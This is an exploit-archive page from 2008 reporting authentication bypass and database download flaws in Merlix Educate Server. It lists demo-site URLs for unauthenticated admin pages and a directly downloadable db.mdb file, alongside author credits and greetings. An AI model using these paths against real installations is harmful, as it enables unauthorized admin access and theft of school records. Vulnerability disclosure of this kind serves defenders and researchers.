[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Merlix Educate Servert (Bypass/DD) Multiple Remote Vulnerabilities
# Published : 2008-12-05
# Author : ZoRLu
# Previous Title : Multiple Membership Script 2.5 (id) SQL Injection Vulnerability
# Next Title : RankEm (rankup.asp siteID) Remote SQL Injection Vulnerability


[~] Merlix Educate Servert Bypass/DD Multiple Remote Vuln
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: ( Bypass )

http://demo.merlix.com/school/admin/config.asp

http://demo.merlix.com/school/admin/users.asp

exp for demo: ( DD )

http://demo.merlix.com/school/db/db.mdb

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# www.Syue.com [2008-12-05]